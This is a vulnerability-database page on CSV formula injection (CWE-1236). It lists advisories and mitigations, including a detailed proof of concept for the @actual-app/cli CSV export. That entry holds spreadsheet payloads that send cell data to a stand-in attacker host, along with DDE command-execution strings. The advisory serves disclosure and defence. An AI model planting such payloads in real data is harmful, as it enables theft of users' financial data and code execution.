Common Weakness Enumeration

CWE-1236

Allowed

Improper Neutralization of Formula Elements in a CSV File

Abstraction: Base · Status: Incomplete

The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.

401 vulnerabilities reference this CWE, most recent first.

GHSA-75QG-QMGW-FJ6V

Vulnerability from github – Published: 2023-07-10 18:30 – Updated: 2024-04-04 05:52
VLAI
Details

IBM Watson Knowledge Catalog on Cloud Pak for Data 4.0 is potentially vulnerable to CSV Injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 251782.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-28958"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-10T16:15:50Z",
    "severity": "HIGH"
  },
  "details": "IBM Watson Knowledge Catalog on Cloud Pak for Data 4.0 is potentially vulnerable to CSV Injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents.  IBM X-Force ID:  251782.",
  "id": "GHSA-75qg-qmgw-fj6v",
  "modified": "2024-04-04T05:52:04Z",
  "published": "2023-07-10T18:30:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28958"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/251782"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7009747"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7983-XRCC-744G

Vulnerability from github – Published: 2023-06-29 03:30 – Updated: 2024-04-04 05:17
VLAI
Details

Ericsson Network Manager (ENM), versions prior to 22.1, contains a vulnerability in the application Network Connectivity Manager (NCM) where improper Neutralization of Formula Elements in a CSV File can lead to remote code execution or data leakage via maliciously injected hyperlinks. The attacker would need admin/elevated access to exploit the vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-46408"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-29T03:15:09Z",
    "severity": "MODERATE"
  },
  "details": "Ericsson Network Manager (ENM), versions prior to 22.1, contains a vulnerability in the application Network Connectivity Manager (NCM) where improper Neutralization of Formula Elements in a CSV File can lead to remote code execution or data leakage via maliciously injected hyperlinks. The attacker would need admin/elevated access to exploit the vulnerability.",
  "id": "GHSA-7983-xrcc-744g",
  "modified": "2024-04-04T05:17:02Z",
  "published": "2023-06-29T03:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46408"
    },
    {
      "type": "WEB",
      "url": "https://www.gruppotim.it/it/footer/red-team.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7F8G-5R7M-GWX4

Vulnerability from github – Published: 2025-05-11 21:30 – Updated: 2025-05-11 21:30
VLAI
Details

A vulnerability was found in 1Panel-dev MaxKB up to 1.10.7. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Knowledge Base Module. The manipulation leads to csv injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.10.8 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early about this disclosure.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-4546"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236",
      "CWE-74"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-11T20:15:18Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was found in 1Panel-dev MaxKB up to 1.10.7. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Knowledge Base Module. The manipulation leads to csv injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.10.8 is able to address this issue. It is recommended to upgrade the affected component. The vendor was contacted early about this disclosure.",
  "id": "GHSA-7f8g-5r7m-gwx4",
  "modified": "2025-05-11T21:30:31Z",
  "published": "2025-05-11T21:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4546"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yaowenxiao721/Poc/blob/main/MaxKB/MaxKB-poc1.md"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.308293"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.308293"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.566517"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-7FXQ-F8VG-7F3W

Vulnerability from github – Published: 2022-05-24 17:42 – Updated: 2026-03-30 15:31
VLAI
Details

Buffer overflow in FinalWire Ltd AIDA64 Engineer 6.00.5100 allows attackers to execute arbitrary code by creating a crafted input that will overwrite the SEH handler.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-19513"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236",
      "CWE-787"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-02-19T00:15:00Z",
    "severity": "HIGH"
  },
  "details": "Buffer overflow in FinalWire Ltd AIDA64 Engineer 6.00.5100 allows attackers to execute arbitrary code by creating a crafted input that will overwrite the SEH handler.",
  "id": "GHSA-7fxq-f8vg-7f3w",
  "modified": "2026-03-30T15:31:33Z",
  "published": "2022-05-24T17:42:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19513"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/46991"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7GH7-258J-4MPQ

Vulnerability from github – Published: 2026-06-22 21:42 – Updated: 2026-06-22 21:42
VLAI
Summary
@actual-app/cli `--format csv` Output Vulnerable to CSV Formula Injection via Custom `escapeCsv` Helper
Details

Summary

@actual-app/cli ships a hand-rolled CSV serializer in packages/cli/src/output.ts (used whenever the global --format csv option is passed) whose escapeCsv helper only handles RFC 4180 delimiter/quote/newline escaping. It does not neutralize the standard CSV formula-injection prefixes (=, +, -, @, \t, \r). Any CLI command that streams an object array containing user-controlled strings — transactions list, accounts list, payees list, categories list, tags list, category-groups list, rules list, schedules list, query — will emit cells that auto-evaluate when the resulting CSV is opened in Excel, LibreOffice Calc, or Google Sheets, enabling data exfiltration (=HYPERLINK(...), =WEBSERVICE(...)) and arbitrary formula execution.

This is a distinct variant of the formula-injection surface in packages/loot-core/src/server/transactions/export/export-to-csv.ts (which uses csv-stringify and would need a separate cast option fix) — they are different files, different packages, and different serializers. Fixing one does not fix the other.

Details

Vulnerable code

packages/cli/src/output.ts:98-103:

function escapeCsv(value: string): string {
  if (value.includes(',') || value.includes('"') || value.includes('\n')) {
    return '"' + value.replace(/"/g, '""') + '"';
  }
  return value;
}

The helper performs only delimiter/quote/newline neutralization, which is sufficient for RFC 4180 parsing but irrelevant to spreadsheet formula evaluation. CSV double-quoting is invisible to Excel/Calc/Sheets — the unquoted cell value =HYPERLINK("http://attacker/?d="&B2,"Click") is still parsed as a formula by the spreadsheet, even when wrapped as "=HYPERLINK(""http://attacker/?d=""&B2,""Click"")" on disk.

Data flow to the sink

  1. The global --format option is registered at packages/cli/src/index.ts:53-57 with choices(['json','table','csv']) and applies to every subcommand.
  2. List/query subcommands invoke printOutput(data, format) (output.ts:105-107), which routes format === 'csv' to formatCsv (output.ts:71-96).
  3. For each row, every column is run through formatCellValue (output.ts:21-26): ts function formatCellValue(key: string, value: unknown): string { if (isAmountValue(key, value)) { return (value / 100).toFixed(2); } return String(value ?? ''); } Only the fixed AMOUNT_FIELDS set (amount, balance, budgeted, etc.) gets numeric coercion. User-controlled string fields — payee.name, account.name, category.name, notes, tag names, rule descriptions, schedule names — are passed verbatim to escapeCsv.
  4. escapeCsv returns the value unmodified unless it contains ,, ", or \n. A payload such as =1+1, @SUM(...), +1+cmd|'/c calc'!A0, or -2+3+cmd|'/c calc'!A0 therefore lands in the output as a leading-character formula.

Exploitability conditions

  • The CLI is installed and used by the victim (@actual-app/cli is published with "bin": { "actual": "./dist/cli.js", "actual-cli": "./dist/cli.js" }).
  • The attacker can persist a malicious string in any user-controlled field of the budget. Realistic vectors:
  • Co-user / co-collaborator of a synced budget (multi-device, or attacker-controlled sync server).
  • Sending the victim a crafted OFX/QIF/CSV import file.
  • API write access (e.g., over a compromised sync session).
  • The victim runs actual <list-cmd> --format csv > out.csv and opens out.csv in a spreadsheet program. CSV files generated locally by the CLI are not gated by Office Protected View / Mark-of-the-Web, so formulas evaluate immediately.

There are no mitigations in the code path: no allowlist, no sanitizer, no cast option, no warning, and the CLI is shipped to end users via npm.

PoC

Setup (one-time — choose any user-controlled field; payee shown):

# Inject via the CLI's own write path (or via OFX/QIF/CSV import, or shared sync):
actual transactions add \
  --account "$ACCOUNT_ID" \
  --data '[{"payee_name":"=HYPERLINK(\"http://attacker.evil/leak?d=\"&B2,\"Bank refund\")","date":"2026-01-01","amount":10000}]'

Trigger (victim runs):

actual transactions list --account "$ACCOUNT_ID" --start 2026-01-01 --end 2026-12-31 --format csv > out.csv
cat out.csv

Observed output (abridged; quoting is RFC 4180-correct but the formula prefix is preserved):

id,date,amount,payee,notes,category,account,cleared,reconciled
abc...,2026-01-01,100.00,"=HYPERLINK(""http://attacker.evil/leak?d=""&B2,""Bank refund"")",,,Checking,false,false

Open out.csv in Excel / LibreOffice Calc / Google Sheets → the payee cell renders as a clickable hyperlink that, when clicked (or auto-fetched in some configurations), exfiltrates neighboring cell content (B2 = the date, but trivially adjustable to any cell) to the attacker.

Minimal-payload variants that bypass escapeCsv entirely (no ,, ", or \n → no quoting at all):

  • Payee name =1+1 → cell shows 2.
  • Payee name @SUM(1+1) → cell shows 2.
  • Payee name +1+1 → cell shows 2.
  • Payee name -2+3 → cell shows 1.

The same applies to other list commands sharing the global --format option:

actual accounts list   --format csv      # account.name
actual payees   list   --format csv      # payee.name
actual categories list --format csv      # category.name
actual tags list       --format csv
actual category-groups list --format csv
actual rules list      --format csv
actual schedules list  --format csv
actual query "..."     --format csv

Verified by reading escapeCsv (packages/cli/src/output.ts:98-103): the only escape triggers are ,, ", \n, and even when triggered the leading character is preserved.

Impact

  • Data exfiltration in the victim's spreadsheet context via =HYPERLINK(...), =WEBSERVICE(...), =IMPORTXML(...) (Sheets), =IMPORTDATA(...) (Sheets) — typically one click for HYPERLINK, fully automatic for WEBSERVICE/IMPORT* on confirmation. Victim's financial data (account names, balances, transactions in adjacent cells) is the natural exfil target.
  • Arbitrary formula execution in the victim's spreadsheet context, including legacy DDE-style payloads on outdated Excel installations (potential RCE).
  • Trust-boundary crossing: financial data the victim assumes is "exported" becomes attacker-controlled active content. The CLI is the victim's own trusted tool; users do not expect actual transactions list --format csv to produce a file that runs code.

Blast radius is bounded by the requirement that the attacker plant a string in a user-controlled field and the victim opens the CSV in a spreadsheet — but both are realistic for a personal-finance app whose primary export workflow is "open in Excel".

Recommended Fix

Neutralize formula-trigger prefixes in escapeCsv before the existing RFC 4180 quoting. Example:

// packages/cli/src/output.ts
const FORMULA_TRIGGERS = /^[=+\-@\t\r]/;

function escapeCsv(value: string): string {
  // Neutralize spreadsheet formula prefixes (CWE-1236).
  if (FORMULA_TRIGGERS.test(value)) {
    value = "'" + value;
  }
  if (value.includes(',') || value.includes('"') || value.includes('\n')) {
    return '"' + value.replace(/"/g, '""') + '"';
  }
  return value;
}

The leading single-quote is the OWASP-recommended neutralizer: it is stripped by Excel/Calc on display but prevents formula evaluation. Apply the same fix in packages/loot-core/src/server/transactions/export/export-to-csv.ts by passing a cast option to csv-stringify that prepends ' to any string starting with a formula trigger — the two sites are independent and both must be patched.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@actual-app/cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "26.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46672"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-22T21:42:15Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\n`@actual-app/cli` ships a hand-rolled CSV serializer in `packages/cli/src/output.ts` (used whenever the global `--format csv` option is passed) whose `escapeCsv` helper only handles RFC 4180 delimiter/quote/newline escaping. It does **not** neutralize the standard CSV formula-injection prefixes (`=`, `+`, `-`, `@`, `\\t`, `\\r`). Any CLI command that streams an object array containing user-controlled strings \u2014 `transactions list`, `accounts list`, `payees list`, `categories list`, `tags list`, `category-groups list`, `rules list`, `schedules list`, `query` \u2014 will emit cells that auto-evaluate when the resulting CSV is opened in Excel, LibreOffice Calc, or Google Sheets, enabling data exfiltration (`=HYPERLINK(...)`, `=WEBSERVICE(...)`) and arbitrary formula execution.\n\nThis is a **distinct variant** of the formula-injection surface in `packages/loot-core/src/server/transactions/export/export-to-csv.ts` (which uses `csv-stringify` and would need a separate `cast` option fix) \u2014 they are different files, different packages, and different serializers. Fixing one does not fix the other.\n\n## Details\n\n### Vulnerable code\n\n`packages/cli/src/output.ts:98-103`:\n\n```ts\nfunction escapeCsv(value: string): string {\n  if (value.includes(\u0027,\u0027) || value.includes(\u0027\"\u0027) || value.includes(\u0027\\n\u0027)) {\n    return \u0027\"\u0027 + value.replace(/\"/g, \u0027\"\"\u0027) + \u0027\"\u0027;\n  }\n  return value;\n}\n```\n\nThe helper performs only delimiter/quote/newline neutralization, which is sufficient for RFC 4180 *parsing* but irrelevant to spreadsheet *formula evaluation*. CSV double-quoting is invisible to Excel/Calc/Sheets \u2014 the unquoted cell value `=HYPERLINK(\"http://attacker/?d=\"\u0026B2,\"Click\")` is still parsed as a formula by the spreadsheet, even when wrapped as `\"=HYPERLINK(\"\"http://attacker/?d=\"\"\u0026B2,\"\"Click\"\")\"` on disk.\n\n### Data flow to the sink\n\n1. The global `--format` option is registered at `packages/cli/src/index.ts:53-57` with `choices([\u0027json\u0027,\u0027table\u0027,\u0027csv\u0027])` and applies to every subcommand.\n2. List/query subcommands invoke `printOutput(data, format)` (`output.ts:105-107`), which routes `format === \u0027csv\u0027` to `formatCsv` (`output.ts:71-96`).\n3. For each row, every column is run through `formatCellValue` (`output.ts:21-26`):\n   ```ts\n   function formatCellValue(key: string, value: unknown): string {\n     if (isAmountValue(key, value)) {\n       return (value / 100).toFixed(2);\n     }\n     return String(value ?? \u0027\u0027);\n   }\n   ```\n   Only the fixed `AMOUNT_FIELDS` set (`amount`, `balance`, `budgeted`, etc.) gets numeric coercion. User-controlled string fields \u2014 `payee.name`, `account.name`, `category.name`, `notes`, tag names, rule descriptions, schedule names \u2014 are passed verbatim to `escapeCsv`.\n4. `escapeCsv` returns the value unmodified unless it contains `,`, `\"`, or `\\n`. A payload such as `=1+1`, `@SUM(...)`, `+1+cmd|\u0027/c calc\u0027!A0`, or `-2+3+cmd|\u0027/c calc\u0027!A0` therefore lands in the output as a leading-character formula.\n\n### Exploitability conditions\n\n- The CLI is installed and used by the victim (`@actual-app/cli` is published with `\"bin\": { \"actual\": \"./dist/cli.js\", \"actual-cli\": \"./dist/cli.js\" }`).\n- The attacker can persist a malicious string in any user-controlled field of the budget. Realistic vectors:\n  - Co-user / co-collaborator of a synced budget (multi-device, or attacker-controlled sync server).\n  - Sending the victim a crafted OFX/QIF/CSV import file.\n  - API write access (e.g., over a compromised sync session).\n- The victim runs `actual \u003clist-cmd\u003e --format csv \u003e out.csv` and opens `out.csv` in a spreadsheet program. CSV files generated locally by the CLI are not gated by Office Protected View / Mark-of-the-Web, so formulas evaluate immediately.\n\nThere are **no mitigations** in the code path: no allowlist, no sanitizer, no `cast` option, no warning, and the CLI is shipped to end users via npm.\n\n## PoC\n\nSetup (one-time \u2014 choose any user-controlled field; payee shown):\n\n```bash\n# Inject via the CLI\u0027s own write path (or via OFX/QIF/CSV import, or shared sync):\nactual transactions add \\\n  --account \"$ACCOUNT_ID\" \\\n  --data \u0027[{\"payee_name\":\"=HYPERLINK(\\\"http://attacker.evil/leak?d=\\\"\u0026B2,\\\"Bank refund\\\")\",\"date\":\"2026-01-01\",\"amount\":10000}]\u0027\n```\n\nTrigger (victim runs):\n\n```bash\nactual transactions list --account \"$ACCOUNT_ID\" --start 2026-01-01 --end 2026-12-31 --format csv \u003e out.csv\ncat out.csv\n```\n\nObserved output (abridged; quoting is RFC 4180-correct but the formula prefix is preserved):\n\n```\nid,date,amount,payee,notes,category,account,cleared,reconciled\nabc...,2026-01-01,100.00,\"=HYPERLINK(\"\"http://attacker.evil/leak?d=\"\"\u0026B2,\"\"Bank refund\"\")\",,,Checking,false,false\n```\n\nOpen `out.csv` in Excel / LibreOffice Calc / Google Sheets \u2192 the `payee` cell renders as a clickable hyperlink that, when clicked (or auto-fetched in some configurations), exfiltrates neighboring cell content (`B2` = the date, but trivially adjustable to any cell) to the attacker.\n\nMinimal-payload variants that bypass `escapeCsv` entirely (no `,`, `\"`, or `\\n` \u2192 no quoting at all):\n\n- Payee name `=1+1` \u2192 cell shows `2`.\n- Payee name `@SUM(1+1)` \u2192 cell shows `2`.\n- Payee name `+1+1` \u2192 cell shows `2`.\n- Payee name `-2+3` \u2192 cell shows `1`.\n\nThe same applies to other list commands sharing the global `--format` option:\n\n```bash\nactual accounts list   --format csv      # account.name\nactual payees   list   --format csv      # payee.name\nactual categories list --format csv      # category.name\nactual tags list       --format csv\nactual category-groups list --format csv\nactual rules list      --format csv\nactual schedules list  --format csv\nactual query \"...\"     --format csv\n```\n\nVerified by reading `escapeCsv` (`packages/cli/src/output.ts:98-103`): the only escape triggers are `,`, `\"`, `\\n`, and even when triggered the leading character is preserved.\n\n## Impact\n\n- **Data exfiltration** in the victim\u0027s spreadsheet context via `=HYPERLINK(...)`, `=WEBSERVICE(...)`, `=IMPORTXML(...)` (Sheets), `=IMPORTDATA(...)` (Sheets) \u2014 typically one click for HYPERLINK, fully automatic for WEBSERVICE/IMPORT* on confirmation. Victim\u0027s financial data (account names, balances, transactions in adjacent cells) is the natural exfil target.\n- **Arbitrary formula execution** in the victim\u0027s spreadsheet context, including legacy DDE-style payloads on outdated Excel installations (potential RCE).\n- **Trust-boundary crossing**: financial data the victim assumes is \"exported\" becomes attacker-controlled active content. The CLI is the victim\u0027s own trusted tool; users do not expect `actual transactions list --format csv` to produce a file that runs code.\n\nBlast radius is bounded by the requirement that the attacker plant a string in a user-controlled field and the victim opens the CSV in a spreadsheet \u2014 but both are realistic for a personal-finance app whose primary export workflow is \"open in Excel\".\n\n## Recommended Fix\n\nNeutralize formula-trigger prefixes in `escapeCsv` *before* the existing RFC 4180 quoting. Example:\n\n```ts\n// packages/cli/src/output.ts\nconst FORMULA_TRIGGERS = /^[=+\\-@\\t\\r]/;\n\nfunction escapeCsv(value: string): string {\n  // Neutralize spreadsheet formula prefixes (CWE-1236).\n  if (FORMULA_TRIGGERS.test(value)) {\n    value = \"\u0027\" + value;\n  }\n  if (value.includes(\u0027,\u0027) || value.includes(\u0027\"\u0027) || value.includes(\u0027\\n\u0027)) {\n    return \u0027\"\u0027 + value.replace(/\"/g, \u0027\"\"\u0027) + \u0027\"\u0027;\n  }\n  return value;\n}\n```\n\nThe leading single-quote is the OWASP-recommended neutralizer: it is stripped by Excel/Calc on display but prevents formula evaluation. Apply the same fix in `packages/loot-core/src/server/transactions/export/export-to-csv.ts` by passing a `cast` option to `csv-stringify` that prepends `\u0027` to any string starting with a formula trigger \u2014 the two sites are independent and both must be patched.",
  "id": "GHSA-7gh7-258j-4mpq",
  "modified": "2026-06-22T21:42:15Z",
  "published": "2026-06-22T21:42:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/actualbudget/actual/security/advisories/GHSA-7gh7-258j-4mpq"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/actualbudget/actual"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@actual-app/cli `--format csv` Output Vulnerable to CSV Formula Injection via Custom `escapeCsv` Helper"
}

GHSA-7MGM-WQ43-MVP7

Vulnerability from github – Published: 2023-11-07 21:30 – Updated: 2026-04-28 15:30
VLAI
Details

Improper Neutralization of Formula Elements in a CSV File vulnerability in Scott Reilly Commenter Emails.This issue affects Commenter Emails: from n/a through 2.6.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-45360"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-11-07T17:15:08Z",
    "severity": "CRITICAL"
  },
  "details": "Improper Neutralization of Formula Elements in a CSV File vulnerability in Scott Reilly Commenter Emails.This issue affects Commenter Emails: from n/a through 2.6.1.",
  "id": "GHSA-7mgm-wq43-mvp7",
  "modified": "2026-04-28T15:30:35Z",
  "published": "2023-11-07T21:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45360"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/commenter-emails/vulnerability/wordpress-commenter-emails-plugin-2-6-1-csv-injection?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/commenter-emails/wordpress-commenter-emails-plugin-2-6-1-csv-injection?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7PMH-G9PC-H622

Vulnerability from github – Published: 2022-04-19 00:00 – Updated: 2022-04-28 00:00
VLAI
Details

Eaton Intelligent Power Manager Infrastructure (IPM Infrastructure) version 1.5.0plus205 and all prior versions are vulnerable to CSV Formula Injection. This issue affects: Eaton Intelligent Power Manager Infrastructure (IPM Infrastructure) all version 1.5.0plus205 and prior versions.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-23286"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-04-18T17:15:00Z",
    "severity": "HIGH"
  },
  "details": "Eaton Intelligent Power Manager Infrastructure (IPM Infrastructure) version 1.5.0plus205 and all prior versions are vulnerable to CSV Formula Injection. This issue affects: Eaton Intelligent Power Manager Infrastructure (IPM Infrastructure) all version 1.5.0plus205 and prior versions.",
  "id": "GHSA-7pmh-g9pc-h622",
  "modified": "2022-04-28T00:00:57Z",
  "published": "2022-04-19T00:00:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23286"
    },
    {
      "type": "WEB",
      "url": "https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/Eaton-Intelligent-Power-Manager-(IPM)-Infrastructure-Vulnerability-Advisory_1001c_V1.0.pdf"
    },
    {
      "type": "WEB",
      "url": "https://www.eaton.com/content/dam/eaton/products/backup-power-ups-surge-it-power-distribution/power-management-software-connectivity/eaton-intelligent-power-manager/software/ipm-understand-edition-emea/eaton-ipminfra-eolmemo-en-us.pdf."
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7RC3-9HXJ-G7H2

Vulnerability from github – Published: 2023-04-24 21:30 – Updated: 2023-04-24 21:30
VLAI
Details

Improper Neutralization of Formula Elements in a CSV File in GitHub repository alfio-event/alf.io prior to 2.0-M4-2304.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-2258"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-24T21:15:09Z",
    "severity": "HIGH"
  },
  "details": "Improper Neutralization of Formula Elements in a CSV File in GitHub repository alfio-event/alf.io prior to 2.0-M4-2304.",
  "id": "GHSA-7rc3-9hxj-g7h2",
  "modified": "2023-04-24T21:30:30Z",
  "published": "2023-04-24T21:30:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2258"
    },
    {
      "type": "WEB",
      "url": "https://github.com/alfio-event/alf.io/commit/94e2923a317452e337393789c9f3192dfc1ddac2"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/31eaf0fe-4d91-4022-aa9b-802bc6eafb8f"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7WQV-9W75-QFXV

Vulnerability from github – Published: 2023-11-07 21:30 – Updated: 2026-04-28 15:30
VLAI
Details

Improper Neutralization of Formula Elements in a CSV File vulnerability in anmari amr users.This issue affects amr users: from n/a through 4.59.4.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-45348"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-11-07T17:15:08Z",
    "severity": "HIGH"
  },
  "details": "Improper Neutralization of Formula Elements in a CSV File vulnerability in anmari amr users.This issue affects amr users: from n/a through 4.59.4.",
  "id": "GHSA-7wqv-9w75-qfxv",
  "modified": "2026-04-28T15:30:34Z",
  "published": "2023-11-07T21:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45348"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/amr-users/vulnerability/wordpress-amr-users-plugin-4-59-4-csv-injection-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/amr-users/wordpress-amr-users-plugin-4-59-4-csv-injection-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-85PM-34G5-W3V6

Vulnerability from github – Published: 2021-11-24 00:00 – Updated: 2024-02-27 23:38
VLAI
Details

Dell EMC CloudLink 7.1 and all prior versions contain a CSV formula Injection Vulnerability. A remote high privileged attacker, may potentially exploit this vulnerability, leading to arbitrary code execution on end user machine

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-36334"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-11-23T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Dell EMC CloudLink 7.1 and all prior versions contain a CSV formula Injection Vulnerability. A remote high privileged attacker, may potentially exploit this vulnerability, leading to arbitrary code execution on end user machine",
  "id": "GHSA-85pm-34g5-w3v6",
  "modified": "2024-02-27T23:38:50Z",
  "published": "2021-11-24T00:00:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36334"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000193031/https-dellservices-lightning-force-com-one-one-app"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation

When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at).

Mitigation
Implementation

If a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula.

Mitigation
Architecture and Design

Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.

No CAPEC attack patterns related to this CWE.